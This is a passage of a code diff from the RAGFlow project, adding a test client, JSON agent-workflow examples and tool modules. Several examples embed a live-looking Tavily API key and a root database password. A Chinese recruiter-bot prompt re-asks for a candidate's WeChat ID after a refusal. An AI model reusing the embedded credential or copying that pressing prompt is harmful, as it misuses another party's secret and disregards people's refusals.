    "avatar": "data:image/jpeg;base64,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"
 }
--- a/agent/templates/technical_docs.json
+++ b/agent/templates/technical_docs.json
--- a/agent/templates/technical_docs_qa.json
+++ b/agent/templates/technical_docs_qa.json
--- a/agent/templates/trip_planner.json
+++ b/agent/templates/trip_planner.json
--- a/agent/templates/web_search_assistant.json
+++ b/agent/templates/web_search_assistant.json
--- a/agent/test/client.py
+++ b/agent/test/client.py
@ -0,0 +1,46 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import argparse
 import os
 from agent.canvas import Canvas
 from api import settings
 if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    dsl_default_path = os.path.join(
        os.path.dirname(os.path.realpath(__file__)),
        "dsl_examples",
        "retrieval_and_generate.json",
    )
    parser.add_argument('-s', '--dsl', default=dsl_default_path, help="input dsl", action='store', required=True)
    parser.add_argument('-t', '--tenant_id', default=False, help="Tenant ID", action='store', required=True)
    parser.add_argument('-m', '--stream', default=False, help="Stream output", action='store_true', required=False)
    args = parser.parse_args()
    settings.init_settings()
    canvas = Canvas(open(args.dsl, "r").read(), args.tenant_id)
    if canvas.get_prologue():
        print(f"==================== Bot =====================\n>    {canvas.get_prologue()}", end='')
    query = ""
    while True:
        canvas.reset(True)
        query = input("\n==================== User =====================\n> ")
        ans = canvas.run(query=query)
        print("==================== Bot =====================\n>    ", end='')
        for ans in canvas.run(query=query):
            print(ans, end='\n', flush=True)
        print(canvas.path)
--- a/agent/test/dsl_examples/categorize_and_agent_with_tavily.json
+++ b/agent/test/dsl_examples/categorize_and_agent_with_tavily.json
@ -0,0 +1,85 @@
 {
  "components": {
            "begin": {
                "obj":{
                    "component_name": "Begin",
                    "params": {
                      "prologue": "Hi there!"
                    }
                },
                "downstream": ["categorize:0"],
                "upstream": []
            },
            "categorize:0": {
                "obj": {
                    "component_name": "Categorize",
                    "params": {
                      "llm_id": "deepseek-chat",
                      "category_description": {
                        "product_related": {
                          "description": "The question is about the product usage, appearance and how it works.",
                          "to": ["agent:0"]
                        },
                        "others": {
                          "description": "The question is not about the product usage, appearance and how it works.",
                          "to": ["message:0"]
                        }
                      }
                    }
                },
                "downstream": [],
                "upstream": ["begin"]
            },
            "message:0": {
                "obj":{
                    "component_name": "Message",
                    "params": {
                      "content": [
                        "Sorry, I don't know. I'm an AI bot."
                      ]
                    }
                },
                "downstream": [],
                "upstream": ["categorize:0"]
            },
            "agent:0": {
                "obj": {
                    "component_name": "Agent",
                    "params": {
                      "llm_id": "deepseek-chat",
                      "sys_prompt": "You are a smart researcher. You could generate proper queries to search. According to the search results, you could deside next query if the result is not enough.",
                      "temperature": 0.2,
                      "llm_enabled_tools": [
                        {
                            "component_name": "TavilySearch",
                            "params": {
                              "api_key": "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"
                            }
                        }
                      ]
                    }
                },
                "downstream": ["message:1"],
                "upstream": ["categorize:0"]
            },
            "message:1": {
                "obj": {
                    "component_name": "Message",
                    "params": {
                      "content": ["{agent:0@content}"]
                    }
                },
                "downstream": [],
                "upstream": ["agent:0"]
            }
  },
  "history": [],
  "path": [],
  "retrival": {"chunks": [], "doc_aggs": []},
  "globals": {
    "sys.query": "",
    "sys.user_id": "",
    "sys.conversation_turns": 0,
    "sys.files": []
  }
 }
--- a/agent/test/dsl_examples/exesql.json
+++ b/agent/test/dsl_examples/exesql.json
@ -0,0 +1,43 @@
 {
  "components": {
            "begin": {
                "obj":{
                    "component_name": "Begin",
                    "params": {
                      "prologue": "Hi there!"
                    }
                },
                "downstream": ["answer:0"],
                "upstream": []
            },
            "answer:0": {
                "obj": {
                    "component_name": "Answer",
                    "params": {}
                },
                "downstream": ["exesql:0"],
                "upstream": ["begin", "exesql:0"]
            },
            "exesql:0": {
                "obj": {
                    "component_name": "ExeSQL",
                    "params": {
                                    "database": "rag_flow",
                                    "username": "root",
                                    "host": "mysql",
                                    "port": 3306,
                                    "password": "infini_rag_flow",
 				    "top_n": 3
                    }
                },
                "downstream": ["answer:0"],
                "upstream": ["answer:0"]
            }
  },
  "history": [],
  "messages": [],
  "reference": {},
  "path": [],
  "answer": []
 }
--- a/agent/test/dsl_examples/headhunter_zh.json
+++ b/agent/test/dsl_examples/headhunter_zh.json
@ -0,0 +1,210 @@
 {
  "components": {
    "begin": {
      "obj": {
        "component_name": "Begin",
        "params": {
          "prologue": "您好！我是AGI方向的猎头，了解到您是这方面的大佬，然后冒昧的就联系到您。这边有个机会想和您分享，RAGFlow正在招聘您这个岗位的资深的工程师不知道您那边是不是感兴趣？"
        }
      },
      "downstream": ["answer:0"],
      "upstream": []
    },
    "answer:0": {
      "obj": {
        "component_name": "Answer",
        "params": {}
      },
      "downstream": ["categorize:0"],
      "upstream": ["begin", "message:reject"]
    },
    "categorize:0": {
      "obj": {
        "component_name": "Categorize",
        "params": {
          "llm_id": "deepseek-chat",
          "category_description": {
            "about_job": {
              "description": "该问题关于职位本身或公司的信息。",
              "examples": "什么岗位？\n汇报对象是谁?\n公司多少人？\n公司有啥产品？\n具体工作内容是啥？\n地点哪里？\n双休吗？",
              "to": "retrieval:0"
            },
            "casual": {
              "description": "该问题不关于职位本身或公司的信息，属于闲聊。",
              "examples": "你好\n好久不见\n你男的女的？\n你是猴子派来的救兵吗？\n上午开会了?\n你叫啥？\n最近市场如何?生意好做吗？",
              "to": "generate:casual"
            },
            "interested": {
              "description": "该回答表示他对于该职位感兴趣。",
              "examples": "嗯\n说吧\n说说看\n还好吧\n是的\n哦\nyes\n具体说说",
              "to": "message:introduction"
            },
            "answer": {
              "description": "该回答表示他对于该职位不感兴趣，或感觉受到骚扰。",
              "examples": "不需要\n不感兴趣\n暂时不看\n不要\nno\n我已经不干这个了\n我不是这个方向的",
              "to": "message:reject"
            }
          }
        }
      },
      "downstream": [
        "message:introduction",
        "generate:casual",
        "message:reject",
        "retrieval:0"
      ],
      "upstream": ["answer:0"]
    },
    "message:introduction": {
      "obj": {
        "component_name": "Message",
        "params": {
          "messages": [
            "我简单介绍以下：\nRAGFlow 是一款基于深度文档理解构建的开源 RAG（Retrieval-Augmented Generation）引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程，结合大语言模型（LLM）针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。https://github.com/infiniflow/ragflow\n您那边还有什么要了解的？"
          ]
        }
      },
      "downstream": ["answer:1"],
      "upstream": ["categorize:0"]
    },
    "answer:1": {
      "obj": {
        "component_name": "Answer",
        "params": {}
      },
      "downstream": ["categorize:1"],
      "upstream": [
        "message:introduction",
        "generate:aboutJob",
        "generate:casual",
        "generate:get_wechat",
        "generate:nowechat"
      ]
    },
    "categorize:1": {
      "obj": {
        "component_name": "Categorize",
        "params": {
          "llm_id": "deepseek-chat",
          "category_description": {
            "about_job": {
              "description": "该问题关于职位本身或公司的信息。",
              "examples": "什么岗位？\n汇报对象是谁?\n公司多少人？\n公司有啥产品？\n具体工作内容是啥？\n地点哪里？\n双休吗？",
              "to": "retrieval:0"
            },
            "casual": {
              "description": "该问题不关于职位本身或公司的信息，属于闲聊。",
              "examples": "你好\n好久不见\n你男的女的？\n你是猴子派来的救兵吗？\n上午开会了?\n你叫啥？\n最近市场如何?生意好做吗？",
              "to": "generate:casual"
            },
            "wechat": {
              "description": "该回答表示他愿意加微信,或者已经报了微信号。",
              "examples": "嗯\n可以\n是的\n哦\nyes\n15002333453\nwindblow_2231",
              "to": "generate:get_wechat"
            },
            "giveup": {
              "description": "该回答表示他不愿意加微信。",
              "examples": "不需要\n不感兴趣\n暂时不看\n不要\nno\n不方便\n不知道还要加我微信",
              "to": "generate:nowechat"
            }
          },
          "message_history_window_size": 8
        }
      },
      "downstream": [
        "retrieval:0",
        "generate:casual",
        "generate:get_wechat",
        "generate:nowechat"
      ],
      "upstream": ["answer:1"]
    },
    "generate:casual": {
      "obj": {
        "component_name": "Generate",
        "params": {
          "llm_id": "deepseek-chat",
          "prompt": "你是AGI方向的猎头，现在候选人的聊了和职位无关的话题，请耐心的回应候选人，并将话题往该AGI的职位上带，最好能要到候选人微信号以便后面保持联系。",
          "temperature": 0.9,
          "message_history_window_size": 12,
          "cite": false
        }
      },
      "downstream": ["answer:1"],
      "upstream": ["categorize:0", "categorize:1"]
    },
    "retrieval:0": {
      "obj": {
        "component_name": "Retrieval",
        "params": {
          "similarity_threshold": 0.2,
          "keywords_similarity_weight": 0.3,
          "top_n": 6,
          "top_k": 1024,
          "rerank_id": "BAAI/bge-reranker-v2-m3",
          "kb_ids": ["869a236818b811ef91dffa163e197198"]
        }
      },
      "downstream": ["generate:aboutJob"],
      "upstream": ["categorize:0", "categorize:1"]
    },
    "generate:aboutJob": {
      "obj": {
        "component_name": "Generate",
        "params": {
          "llm_id": "deepseek-chat",
          "prompt": "你是AGI方向的猎头，候选人问了有关职位或公司的问题，你根据以下职位信息回答。如果职位信息中不包含候选人的问题就回答不清楚、不知道、有待确认等。回答完后引导候选人加微信号，如：\n - 方便加一下微信吗，我把JD发您看看？\n  - 微信号多少，我把详细职位JD发您？\n      职位信息如下:\n      {input}\n      职位信息如上。",
          "temperature": 0.02
        }
      },
      "downstream": ["answer:1"],
      "upstream": ["retrieval:0"]
    },
    "generate:get_wechat": {
      "obj": {
        "component_name": "Generate",
        "params": {
          "llm_id": "deepseek-chat",
          "prompt": "你是AGI方向的猎头，候选人表示不反感加微信，如果对方已经报了微信号，表示感谢和信任并表示马上会加上；如果没有，则问对方微信号多少。你的微信号是weixin_kevin，E-mail是kkk@ragflow.com。说话不要重复。不要总是您好。",
          "temperature": 0.1,
          "message_history_window_size": 12,
          "cite": false
        }
      },
      "downstream": ["answer:1"],
      "upstream": ["categorize:1"]
    },
    "generate:nowechat": {
      "obj": {
        "component_name": "Generate",
        "params": {
          "llm_id": "deepseek-chat",
          "prompt": "你是AGI方向的猎头，当你提出加微信时对方表示拒绝。你需要耐心礼貌的回应候选人，表示对于保护隐私信息给予理解，也可以询问他对该职位的看法和顾虑。并在恰当的时机再次询问微信联系方式。也可以鼓励候选人主动与你取得联系。你的微信号是weixin_kevin，E-mail是kkk@ragflow.com。说话不要重复。不要总是您好。",
          "temperature": 0.1,
          "message_history_window_size": 12,
          "cite": false
        }
      },
      "downstream": ["answer:1"],
      "upstream": ["categorize:1"]
    },
    "message:reject": {
      "obj": {
        "component_name": "Message",
        "params": {
          "messages": [
            "好的，祝您生活愉快，工作顺利。",
            "哦，好的，感谢您宝贵的时间！"
          ]
        }
      },
      "downstream": ["answer:0"],
      "upstream": ["categorize:0"]
    }
  },
  "history": [],
  "messages": [],
  "path": [],
  "reference": [],
  "answer": []
 }
--- a/agent/test/dsl_examples/iteration.json
+++ b/agent/test/dsl_examples/iteration.json
@ -0,0 +1,92 @@
 {
  "components": {
            "begin": {
                "obj":{
                    "component_name": "Begin",
                    "params": {
                      "prologue": "Hi there!"
                    }
                },
                "downstream": ["generate:0"],
                "upstream": []
            },
            "generate:0": {
                "obj": {
                    "component_name": "Agent",
                    "params": {
                      "llm_id": "deepseek-chat",
                      "sys_prompt": "You are an helpful research assistant. \nPlease decompose user's topic: '{sys.query}' into several meaningful sub-topics. \nThe output format MUST be an string array like: [\"sub-topic1\", \"sub-topic2\", ...]. Redundant information is forbidden.",
                      "temperature": 0.2,
                      "cite":false,
                      "output_structure": ["sub-topic1", "sub-topic2", "sub-topic3"]
                    }
                },
                "downstream": ["iteration:0"],
                "upstream": ["begin"]
            },
            "iteration:0": {
                "obj": {
                    "component_name": "Iteration",
                    "params": {
                      "items_ref": "generate:0@structured_content"
                    }
                },
                "downstream": ["message:0"],
                "upstream": ["generate:0"]
            },
            "iterationitem:0": {
                "obj": {
                    "component_name": "IterationItem",
                    "params": {}
                },
                "parent_id": "iteration:0",
                "downstream": ["tavily:0"],
                "upstream": []
            },
            "tavily:0": {
                "obj": {
                    "component_name": "TavilySearch",
                    "params": {
                      "api_key": "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",
                      "query": "iterationitem:0@result"
                    }
                },
                "parent_id": "iteration:0",
                "downstream": ["generate:1"],
                "upstream": ["iterationitem:0"]
            },
            "generate:1": {
                "obj": {
                    "component_name": "Agent",
                    "params": {
                      "llm_id": "deepseek-chat",
                      "sys_prompt": "Your goal is to provide answers based on information from the internet. \nYou must use the provided search results to find relevant online information. \nYou should never use your own knowledge to answer questions.\nPlease include relevant url sources in the end of your answers.\n\n \"{tavily:0@formalized_content}\" \nUsing the above information, answer the following question or topic: \"{iterationitem:0@result} \"\nin a detailed report — The report should focus on the answer to the question, should be well structured, informative, in depth, with facts and numbers if available, a minimum of 200 words and with markdown syntax and apa format. Write all source urls at the end of the report in apa format. You should write your report only based on the given information and nothing else.",
                      "temperature": 0.9,
                      "cite":false
                    }
                },
                "parent_id": "iteration:0",
                "downstream": ["iterationitem:0"],
                "upstream": ["tavily:0"]
            },
            "message:0": {
                "obj": {
                    "component_name": "Message",
                    "params": {
                      "content": ["{iteration:0@generate:1}"]
                    }
                },
                "downstream": [],
                "upstream": ["iteration:0"]
            }
  },
  "history": [],
  "path": [],
  "retrival": {"chunks": [], "doc_aggs": []},
  "globals": {
    "sys.query": "",
    "sys.user_id": "",
    "sys.conversation_turns": 0,
    "sys.files": []
  }
 }
--- a/agent/test/dsl_examples/retrieval_and_generate.json
+++ b/agent/test/dsl_examples/retrieval_and_generate.json
@ -0,0 +1,61 @@
 {
  "components": {
            "begin": {
                "obj":{
                    "component_name": "Begin",
                    "params": {
                      "prologue": "Hi there!"
                    }
                },
                "downstream": ["retrieval:0"],
                "upstream": []
            },
            "retrieval:0": {
                "obj": {
                    "component_name": "Retrieval",
                    "params": {
                      "similarity_threshold": 0.2,
                      "keywords_similarity_weight": 0.3,
                      "top_n": 6,
                      "top_k": 1024,
                      "rerank_id": "",
                      "empty_response": "Nothing found in dataset",
                      "kb_ids": ["1a3d1d7afb0611ef9866047c16ec874f"]
                    }
                },
                "downstream": ["generate:0"],
                "upstream": ["begin"]
            },
            "generate:0": {
                "obj": {
                    "component_name": "LLM",
                    "params": {
                      "llm_id": "deepseek-chat",
                      "sys_prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n      Here is the knowledge base:\n      {retrieval:0@formalized_content}\n      The above is the knowledge base.",
                      "temperature": 0.2
                    }
                },
                "downstream": ["message:0"],
                "upstream": ["retrieval:0"]
            },
            "message:0": {
                "obj": {
                    "component_name": "Message",
                    "params": {
                      "content": ["{generate:0@content}"]
                    }
                },
                "downstream": [],
                "upstream": ["generate:0"]
            }
  },
  "history": [],
  "path": [],
  "retrival": {"chunks": [], "doc_aggs": []},
  "globals": {
    "sys.query": "",
    "sys.user_id": "",
    "sys.conversation_turns": 0,
    "sys.files": []
  }
 }
--- a/agent/test/dsl_examples/retrieval_categorize_and_generate.json
+++ b/agent/test/dsl_examples/retrieval_categorize_and_generate.json
@ -0,0 +1,95 @@
 {
  "components": {
            "begin": {
                "obj":{
                    "component_name": "Begin",
                    "params": {
                      "prologue": "Hi there!"
                    }
                },
                "downstream": ["categorize:0"],
                "upstream": []
            },
            "categorize:0": {
                "obj": {
                    "component_name": "Categorize",
                    "params": {
                      "llm_id": "deepseek-chat",
                      "category_description": {
                        "product_related": {
                          "description": "The question is about the product usage, appearance and how it works.",
                          "examples": [],
                          "to": ["retrieval:0"]
                        },
                        "others": {
                          "description": "The question is not about the product usage, appearance and how it works.",
                          "examples": [],
                          "to": ["message:0"]
                        }
                      }
                    }
                },
                "downstream": [],
                "upstream": ["begin"]
            },
            "message:0": {
                "obj":{
                    "component_name": "Message",
                    "params": {
                      "content": [
                        "Sorry, I don't know. I'm an AI bot."
                      ]
                    }
                },
                "downstream": [],
                "upstream": ["categorize:0"]
            },
            "retrieval:0": {
                "obj": {
                    "component_name": "Retrieval",
                    "params": {
                      "similarity_threshold": 0.2,
                      "keywords_similarity_weight": 0.3,
                      "top_n": 6,
                      "top_k": 1024,
                      "rerank_id": "",
                      "empty_response": "Nothing found in dataset",
                      "kb_ids": ["1a3d1d7afb0611ef9866047c16ec874f"]
                    }
                },
                "downstream": ["generate:0"],
                "upstream": ["categorize:0"]
            },
            "generate:0": {
                "obj": {
                    "component_name": "Agent",
                    "params": {
                      "llm_id": "deepseek-chat",
                      "sys_prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n      Here is the knowledge base:\n      {retrieval:0@formalized_content}\n      The above is the knowledge base.",
                      "temperature": 0.2
                    }
                },
                "downstream": ["message:1"],
                "upstream": ["retrieval:0"]
            },
            "message:1": {
                "obj": {
                    "component_name": "Message",
                    "params": {
                      "content": ["{generate:0@content}"]
                    }
                },
                "downstream": [],
                "upstream": ["generate:0"]
            }
  },
  "history": [],
  "path": [],
  "retrival": {"chunks": [], "doc_aggs": []},
  "globals": {
    "sys.query": "",
    "sys.user_id": "",
    "sys.conversation_turns": 0,
    "sys.files": []
  }
 }
--- a/agent/test/dsl_examples/tavily_and_generate.json
+++ b/agent/test/dsl_examples/tavily_and_generate.json
@ -0,0 +1,55 @@
 {
  "components": {
            "begin": {
                "obj":{
                    "component_name": "Begin",
                    "params": {
                      "prologue": "Hi there!"
                    }
                },
                "downstream": ["tavily:0"],
                "upstream": []
            },
            "tavily:0": {
                "obj": {
                    "component_name": "TavilySearch",
                    "params": {
                      "api_key": "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"
                    }
                },
                "downstream": ["generate:0"],
                "upstream": ["begin"]
            },
            "generate:0": {
                "obj": {
                    "component_name": "LLM",
                    "params": {
                      "llm_id": "deepseek-chat",
                      "sys_prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n      Here is the knowledge base:\n      {tavily:0@formalized_content}\n      The above is the knowledge base.",
                      "temperature": 0.2
                    }
                },
                "downstream": ["message:0"],
                "upstream": ["tavily:0"]
            },
            "message:0": {
                "obj": {
                    "component_name": "Message",
                    "params": {
                      "content": ["{generate:0@content}"]
                    }
                },
                "downstream": [],
                "upstream": ["generate:0"]
            }
  },
  "history": [],
  "path": [],
  "retrival": {"chunks": [], "doc_aggs": []},
  "globals": {
    "sys.query": "",
    "sys.user_id": "",
    "sys.conversation_turns": 0,
    "sys.files": []
  }
 }
--- a/agent/tools/init.py
+++ b/agent/tools/init.py
@ -0,0 +1,48 @@
 #
 #  Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import os
 import importlib
 import inspect
 from types import ModuleType
 from typing import Dict, Type
 _package_path = os.path.dirname(__file__)
 __all_classes: Dict[str, Type] = {}
 def _import_submodules() -> None:
    for filename in os.listdir(_package_path): # noqa: F821
        if filename.startswith("__") or not filename.endswith(".py") or filename.startswith("base"):
            continue
        module_name = filename[:-3]
        try:
            module = importlib.import_module(f".{module_name}", package=__name__)
            _extract_classes_from_module(module)  # noqa: F821
        except ImportError as e:
            print(f"Warning: Failed to import module {module_name}: {str(e)}")
 def _extract_classes_from_module(module: ModuleType) -> None:
    for name, obj in inspect.getmembers(module):
        if (inspect.isclass(obj) and
                obj.__module__ == module.__name__ and not name.startswith("_")):
            __all_classes[name] = obj
            globals()[name] = obj
 _import_submodules()
 __all__ = list(__all_classes.keys()) + ["__all_classes"]
 del _package_path, _import_submodules, _extract_classes_from_module
--- a/agent/tools/akshare.py
+++ b/agent/tools/akshare.py
@ -0,0 +1,56 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 from abc import ABC
 import pandas as pd
 from agent.component.base import ComponentBase, ComponentParamBase
 class AkShareParam(ComponentParamBase):
    """
    Define the AkShare component parameters.
    """
    def __init__(self):
        super().__init__()
        self.top_n = 10
    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
 class AkShare(ComponentBase, ABC):
    component_name = "AkShare"
    def _run(self, history, **kwargs):
        import akshare as ak
        ans = self.get_input()
        ans = ",".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return AkShare.be_output("")
        try:
            ak_res = []
            stock_news_em_df = ak.stock_news_em(symbol=ans)
            stock_news_em_df = stock_news_em_df.head(self._param.top_n)
            ak_res = [{"content": '<a href="' + i["新闻链接"] + '">' + i["新闻标题"] + '</a>\n 新闻内容: ' + i[
                "新闻内容"] + " \n发布时间:" + i["发布时间"] + " \n文章来源: " + i["文章来源"]} for index, i in stock_news_em_df.iterrows()]
        except Exception as e:
            return AkShare.be_output("**ERROR**: " + str(e))
        if not ak_res:
            return AkShare.be_output("")
        return pd.DataFrame(ak_res)
--- a/agent/tools/arxiv.py
+++ b/agent/tools/arxiv.py
@ -0,0 +1,102 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
